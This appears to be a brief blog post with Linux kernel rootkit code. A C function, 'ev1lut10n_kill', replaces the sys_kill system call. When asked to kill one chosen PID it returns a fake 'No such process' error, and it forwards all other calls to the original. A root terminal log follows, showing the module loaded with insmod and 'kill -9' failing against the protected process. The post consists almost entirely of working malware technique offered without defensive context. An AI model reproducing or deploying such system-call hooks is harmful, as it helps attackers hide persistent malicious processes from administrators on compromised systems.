how to make hijacked sys_kill looks natural
========
asmlinkage unsigned long *ev1lut10n_kill(int pid, int sig)
{
/**#include <linux/sched.h>**/
if(pid==EV1LUT10N_PID)
{
return (unsigned long *) (-ESRCH); /**error message : No Such Process**/
}
else
{
return (unsigned long *) (*kill_asli)(pid,sig);
}
}
====================
and it looks natural:
=======
root@ev1lut10n-Vostro1310:/home/ev1lut10n/Desktop/ev1lut10n_lkm# insmod ev1lut10n.ko
root@ev1lut10n-Vostro1310:/home/ev1lut10n/Desktop/ev1lut10n_lkm# kill -9 16372
bash: kill: (16372) - No such process
=============
Home »Unlabelled » how to make hijacked sys_kill looks natural